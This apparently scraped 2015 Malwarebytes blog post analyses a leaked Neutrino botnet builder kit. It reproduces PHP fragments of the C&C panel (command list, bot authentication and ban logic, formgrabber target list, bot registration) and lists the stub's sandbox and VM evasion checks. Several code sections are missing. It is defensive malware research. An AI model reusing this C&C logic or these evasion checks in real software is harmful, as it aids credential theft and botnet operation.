# Inside Neutrino botnet builder **[blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/](https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/)** hasherezade August 19, 2015 It is common practice among cybercriminals to sell their products in the form of packages, consisting of: **a malicious payload – a frontend of the malware that is used for infecting users** **a C&C panel – a backend of the malware, usually designed as a web-application, often** dedicated to LAMP environment **a builder – an application used for packing the payload and embedding in it** information specific for the interest of the particular distributor (the C&C address, some configuration, etc) Such packages are commercial products sold on the black market. However, from time to time it happens that the product leaks into mainstream media. It gives researchers a precious opportunity to take a closer look on the used techniques. [Recently, I found a leaked package containing the builder for the Neutrino botnet. It is not](https://www.malwarebytes.com/botnet) the newest version (as usually the case), but it still provides lot of useful information that can help in comparative analysis with the samples that are nowadays actively distributed. ## Elements involved ----- – Neutrino Builder – 32 bit PE, written in VS2013, packed with Safengine Shielden **[v2.3.6.0 (md5=80660973563d13dfa57748bacc4f7758)](https://www.virustotal.com/en/file/e05b7d761bd3ed4b0c46572815949768ca7a8a46d145448db82237b6e88d17bb/analysis/)** – panel (written in PHP) – stub (payload) – 32 bit PE, written in MS Visual C++ [(md5=55612860c7bf1425c939815a9867b560, section .text](https://www.virustotal.com/en/file/062c0eb2778d85986248b422cf4f48ad219e4422262163099e053483e0a3ccd4/analysis/) md5=07d78519904f1e2806dda92b7c046d71) ## Functionality ### Neutrino Builder v3.9.4 The builder has been written in Visual Studio 2013, and it requires the appropriate redistributable package to run. The provided version is cracked (as the banner states: “Cracked and coded by 0x22”). The functionality of this tool is very simple – it just asks a user for the C&C address and writes it inside the payload: Comparing 2 payloads – the original one, and the one edited by the Builder, we can see that changes made by the builder are really small – it simply encrypts the supplied URL and stores it in the dedicated section. Below: left (stub) – original payload, right (test_stub.exe) – edited payload. ----- ### Panel ----- The package contains full instructions written in Russian (readme.txt), where we can find many interesting details about the functionality (examples below). ----- The requirements for the panel installation: PHP MySQL not lower than 5.6 (for the full functionality) Default login and password to the panel: admin, admin Tasks performed by the infected client on demand: various types of DDoS attacks keylogging (enable/disable), including – trace text in a defined window find file of the defined type update bot remove bot DNS spoofing (redirect address X to address Y) Formgrabbing, stealing FTP credentials download and execute a file one of the following types (EXE, DLL, bat, vbs) add defined entry into the Windows Registry Full list of commands sent to bot: ----- ``` ($ ) { switch (strtolower($command)) { case "ddos": return "http"; break; case "https ddos": return "https"; break; case "slowloris ddos": return "slow"; break; case "smart http ddos": return "smart"; break; case "download flood": return "dwflood"; break; case "udp ddos": return "udp"; break; case "tcp ddos": return "tcp"; break; case "find file": return "findfile"; break; case "cmd shell": return "cmd"; break; case "keylogger": return "keylogger"; break; case "spreading": return "spread"; break; case "update": return "update"; break; case "loader": return "loader"; break; case "visit url": return "visit"; break; case "bot killer": return "botkiller"; break; case "infection": return "infect"; break; case "dns spoofing": return "dns"; break; } return "failed"; } C&C is very sensitive for illegitimate requests and reacts by blacklisting the IP of the source: ``` ----- ``` { $bot_user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0"; if ($_SERVER['HTTP_USER_AGENT'] != $bot_user_agent) { AddBan($ip); } if (!isset($_COOKIE['authkeys'])) { AddBan($ip); } $cookie_check = $_COOKIE['authkeys']; if ($cookie_check != "21232f297a57a5a743894a0e4a801fc3") { /* md5(admin) */ AddBan($ip); } } Looking at install.php we can also see what are the formgrabbing targets. The list includes the most popular e-mails and social networking sites (facebook, linkedin, twitter and others). ``` ----- ``` "('capture_all', '.microsoft.com\r\ntiles.services.mozilla.com\r\nservices.mozilla.com\r\n.mcafee.com\r\nvs.mcafeeasap.com\r\nscan.pchealthadvisor.com\r\navg.com\r\nrrs.symantec.com\r\n \r\n.msg.yahoo.com\r\ngames.yahoo.com\r\n.toolbar.yahoo.com\r\nquery.yahoo.com\r\nyahoo.com/pjsal\r\neBayISAPI.dll? VISuperSize&item=\r\nbeap.bc.yahoo.com\r\n.mail.yahoo.com/ws/mail/v1/formrpc? appid=YahooMailClassic\r\n.mail.yahoo.com/dc/troubleLoading\r\n.mail.yahoo.com/mc/compose\r\nmail.yahoo.com/mc/showFolder\r\nmail.yahoo.com/mc/showMessage\r\ninstallers analytics.com/collect\r\nmaps.google\r\nnews.google\r\ngoogleapis.com\r\noogle.com/u/0/\r\noogle.com/u/1/\r\noogle.com/u/2/\r\noogle.com/u/3/\r\noogle.com/u/4/\r\noogle channel/channel/\r\noogle.com/cloudsearch/\r\noogle.com/document/\r\noogle.com/dr\r\noogle.com/act\r\noogle.com/pref\r\noogle.com/cp\r\noogle.com/drive/\r\noogle.com/o/ ui\r\noogle.com/calendar\r\nogle.com/logos/\r\noglevideo.com\r\noglesyndication.com/activeview\r\nreddit.com/api/\r\ngeo.opera.com\r\n.com/do/mail/message/\r\nhttpcs.ms friends/\r\nfacebook.com/growth/\r\nfacebook.com/intl/\r\nfacebook.com/logout\r\nfacebook.com/mobile/\r\nfacebook.com/photos/\r\nfacebook.com/video/\r\nfacebook.com/plu trk\r\nlinkedin.com/wvmx/\r\nmyspace.com/beacon/\r\nmyspace.com/ajax/\r\nok.ru/app\r\nok.ru/gwtlog\r\nok.ru/? cmd\r\nok.ru/dk\r\nok.ru/feed\r\nok.ru/game\r\nok.ru/profile\r\nok.ru/push\r\nplayer.vimeo.com\r\nsgsapps.com\r\nmyfarmvillage.com\r\napi.connect.facebook.com\r\nupload wa=wsignin1.0\r\nusers.storage.live.com/users/\r\naccount.live.com/API/\r\nmail.live.com/mail/mail.fpp\r\nmail.live.com/mail/options\r\nmail.live.com/ol/\r\nmail.live.c abn-finder/\r\namazon.com/gp/registry/wishlist/')"; $ff_hostname = "INSERT INTO `formgrabber_host` (`hostnames`) VALUES ('live,mail,paypal')"; The main file used for communication with the bot is tasks.php. Only POST requests are accepted. Below: adding information sent by a bot into the database: ``` ----- ``` AddBan($real_ip); } CheckBotUserAgent($real_ip); CheckBan($real_ip); if (isset($_POST['cmd'])) { $time = time(); $date = date('Y-m-d H:i:s'); $bot_ip = $real_ip; $bot_os = $_POST['os']; $bot_name = urlencode($_POST['uid']); $bot_uid = md5($bot_os . $bot_name); $bot_time = $time; $bot_date = $date; $bot_av = strip_data($_POST['av']); $bot_version = strip_data($_POST['version']); $bot_quality = intval($_POST['quality']); $gi = geoip_open("GeoIP/GeoIP.dat";, GEOIP_STANDARD); $bot_country = geoip_country_code_by_addr($gi, $bot_ip); if ($bot_country == null) { $bot_country = "O1"; } geoip_close($gi); Opening index.php causes adding client’s IP into a blacklist (unconditional): ``` ----- ``` AddBan($real_ip); Stub All the commands that can be found in the backend are reflected in the frontend. We can see it clearly, because the payload is not obfuscated! Hard-coded authkey, that is checked in by the C&C occurs in every request sent by the bot: Bot is registering itself to C&C, reporting its version and environment: Implementation of the commands requested by the C&C (selected examples): Downloading specified payload form the C&C: ``` ----- ``` Keylogger (fragment) Framegrabber (fragment) ``` ----- ``` Steal Clipboard content (fragment): The stolen content (i.e. logged keys) is saved in a file(logs.rar). Further, the file is read and uploaded to the C&C: ``` ----- ``` Wrapping the file in a POST request: Also, success and failure of every task requested by the C&C is reported by the bot: ``` ----- ``` This malware is a threat not only for a local computer. It also scans LAN searching for shared resources and steals them: Steal shared (fragment): ``` ----- ``` Defensive techniques The payload also contains an extensive set of various defensive functions. In addition to the well-known checks – like isDebuggerPresent, we can find some that are less spread – like checking the user name against names used by known sandboxes: “maltest”, “tequilaboomboom”,”sandbox”, “virus”, “malware”. Full set explained below: ``` **is debugger present, via:** _IsDebuggerPresent_ **is remote debugger present, via:** _CheckRemoteDebuggerPresent(GetCurrentProcess(), pDebuggerPresent)_ **check if running under Wine, via:** _GetProcAddress(GetModuleHandleW(“kernel32.dll”), “wine_get_unix_file_name”)_ Check presence of blacklisted substrings (ignore case): **username via:** _GetUserNameW vs {“MALTEST“, “TEQUILABOOMBOOM“, “SANDBOX“,_ “VIRUS“,”MALWARE“} **current module name, via:** _GetModuleNameW vs {“SAMPLE“, “VIRUS“, “SANDBOX” }_ **BIOS version, via registry key:** “HARDWARE\Description\System“, value “SystemBiosVersion” against: {“VBOX“, “QEMU“, “BOCHS“} **BIOS version, via registry key:** “HARDWARE\Description\System“, value “VideoBiosVersion” against: “VIRTUALBOX“ ----- **SCSI : via registry key:** “HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id“, value “Identifier“), against {“VMWARE“, “VBOX“, “QEMU“} Check presence of: **VMWareTools, via registry key: SOFTWARE\VMware, Inc.\VMware Tools** **VBoxGuestAdditions, via registry key: SOFTWARE\Oracle\VirtualBox Guest** _Additions_ ## Conclusion Malware analysts usually deal with just one piece of the puzzle from the following set – the malicious payload. Having a look at full packages, like the one described above, helps to see the bigger picture. It also gives a good overview on how the actions of distributing malware are coordinated. As we can see, criminals are provided with a very easy way to bootstrap their own malicious C&C. It doesn’t really require advanced technical skills to become a botnet owner. We live in age when malware is a weapon available to the masses – that’s why it is so crucial for everyone to have a solid and layered protection. -----